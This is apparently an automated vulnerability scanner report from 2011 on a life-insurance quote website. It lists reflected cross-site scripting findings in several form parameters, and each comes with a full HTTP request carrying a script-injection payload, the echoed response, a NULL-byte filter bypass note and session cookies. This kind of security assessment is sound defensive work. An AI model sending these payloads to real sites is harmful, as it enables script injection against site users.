FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Terma99ec<a%20b%3dc>0eee69f868e&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:24 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:24'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44674


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
</strong> OPTerm 30 - 30 Year Terma99ec<a b=c>0eee69f868e product. This is $1,000,000.00 of 30 Year Level Term Guaranteed coverage.</p>
...[SNIP]...

1.17. http://www.accuquotelife.com/apply.cfm [Product parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad342"><img%20src%3da%20onerror%3dalert(1)>f78ef789081d7f2e1 was submitted in the Product parameter. This input was echoed as ad342"><img src=a onerror=alert(1)>f78ef789081d7f2e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Termad342"><img%20src%3da%20onerror%3dalert(1)>f78ef789081d7f2e1&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:20'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="Product" id="Product" value="OPTerm 30 - 30 Year Termad342"><img src=a onerror=alert(1)>f78ef789081d7f2e1" />
...[SNIP]...

1.18. http://www.accuquotelife.com/apply.cfm [Product parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Product request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6507"%3balert(1)//217715483c5d29680 was submitted in the Product parameter. This input was echoed as a6507";alert(1)//217715483c5d29680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Terma6507"%3balert(1)//217715483c5d29680&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:21 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:21'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
s.prop6="09:30 AM"

s.prop7="Thursday"

s.prop8="Weekday"
/* E-commerce Variables */
s.products=";OPTerm 30 - 30 Year Terma6507";alert(1)//217715483c5d29680;1;1000000"
s.purchaseID="0"
/* Test & Target Plugin */
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/

...[SNIP]...

1.19. http://www.accuquotelife.com/apply.cfm [ShortLeadID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the ShortLeadID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95525"><script>alert(1)</script>d35ff8b8cc37edc37 was submitted in the ShortLeadID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=1086885895525"><script>alert(1)</script>d35ff8b8cc37edc37&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:45 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:45'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" id="ShortLeadID" name="ShortLeadID" value="1086885895525"><script>alert(1)</script>d35ff8b8cc37edc37" />
...[SNIP]...

1.20. http://www.accuquotelife.com/apply.cfm [TobaccoUseTypeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the TobaccoUseTypeID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e8e"><script>alert(1)</script>cd4f87abd029bcff5 was submitted in the TobaccoUseTypeID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=1049e8e"><script>alert(1)</script>cd4f87abd029bcff5&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:14 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:14'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 42698


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="TobaccoUseTypeID" id="TobaccoUseTypeID" value="1049e8e"><script>alert(1)</script>cd4f87abd029bcff5" />
...[SNIP]...

1.21. http://www.accuquotelife.com/quote_results.cfm [Email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /quote_results.cfm

Issue detail

The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9a6f"><script>alert(1)</script>dd1e12941a8481226 was submitted in the Email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /quote_results.cfm?Sex=2&StateID=1&TobaccoUseTypeID=10&Catagory=7&BirthMonth=1&BirthDay=01&BirthYear=1970&FaceAmountID=19&Health=477&FirstName=xss&LastName=cdd&DayTimePhone1=212&DayTimePhone2=555&DayTimePhone3=1212&Email=xss%40accuquote.comc9a6f"><script>alert(1)</script>dd1e12941a8481226&image.x=101&image.y=8&ContactTimeID=1&EveningPhone1=&EveningPhone2=&EveningPhone3= HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/index11b.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; mbox=check#true#1313678249|session#1313678182912-659761#1313680049|PC#1313678182912-659761.19#1314887789; s_cc=true; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; CT_Type=1; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=accuquotelifeproduction%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/index11-images/display-quotes-btn.png%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:12 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:12'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 49859


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="Email" id="Email" value="xss@accuquote.comc9a6f"><script>alert(1)</script>dd1e12941a8481226" />
...[SNIP]...

1.22. http://www.accuquotelife.com/quote_results.cfm [FirstName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /quote_results.cfm

Issue detail

The value of the FirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c25"><script>alert(1)</script>24f1a6bc8cda00737 was submitted in the FirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /quote_results.cfm?Sex=2&StateID=1&TobaccoUseTypeID=10&Catagory=7&BirthMonth=1&BirthDay=01&BirthYear=1970&FaceAmountID=19&Health=477&FirstName=xss98c25"><script>alert(1)</script>24f1a6bc8cda00737&LastName=cdd&DayTimePhone1=212&DayTimePhone2=555&DayTimePhone3=1212&Email=xss%40accuquote.com&image.x=101&image.y=8&ContactTimeID=1&EveningPhone1=&EveningPhone2=&EveningPhone3= HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/index11b.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; mbox=check#true#1313678249|session#1313678182912-659761#1313680049|PC#1313678182912-659761.19#1314887789; s_cc=true; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; CT_Type=1; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=accuquotelifeproduction%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/index11-images/display-quotes-btn.png%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:08 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:08'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 49859


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="FirstName" id="FirstName" value="xss98c25"><script>alert(1)</script>24f1a6bc8cda00737" />
...[SNIP]...

1.23. http://www.accuquotelife.com/quote_results.cfm [LastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /quote_results.cfm

Issue detail

The value of the LastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4eb3"><script>alert(1)</script>e3e44e971013fab31 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /quote_results.cfm?Sex=2&StateID=1&TobaccoUseTypeID=10&Catagory=7&BirthMonth=1&BirthDay=01&BirthYear=1970&FaceAmountID=19&Health=477&FirstName=xss&LastName=cddb4eb3"><script>alert(1)</script>e3e44e971013fab31&DayTimePhone1=212&DayTimePhone2=555&DayTimePhone3=1212&Email=xss%40accuquote.com&image.x=101&image.y=8&ContactTimeID=1&EveningPhone1=&EveningPhone2=&EveningPhone3= HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/index11b.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; mbox=check#true#1313678249|session#1313678182912-659761#1313680049|PC#1313678182912-659761.19#1314887789; s_cc=true; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; CT_Type=1; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=accuquotelifeproduction%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/index11-images/display-quotes-btn.png%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:10 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:10'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 49859


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="LastName" id="LastName" value="cddb4eb3"><script>alert(1)</script>e3e44e971013fab31" />
...[SNIP]...

2. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. http://www.accuquotelife.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=%5B%5BB%5D%5D; mbox=session#1313678182912-659761#1313680160|PC#1313678182912-659761.19#1314887900|check#true#1313678360

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:09 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:09'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: REFDIR=;expires=Thu, 08-Sep-2011 14:38:09 GMT;path=/
Vary: Accept-Encoding
Content-Length: 54619


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
<span id="siteseal">
<script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=i3vAY8jiapbPmz0mPW7I1QqnSgIjFCJPL6yiqnsOOaCEJQZeLeYdfDAv7yT"></script>
...[SNIP]...
</iframe>
<script language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- ConvergeTrack Landing Pixel Code -->
<script type="text/javascript" src="//hits.convergetrack.com/Includes/CT.js"></script>
...[SNIP]...

2.2. http://www.accuquotelife.com/apply.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /apply.cfm HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
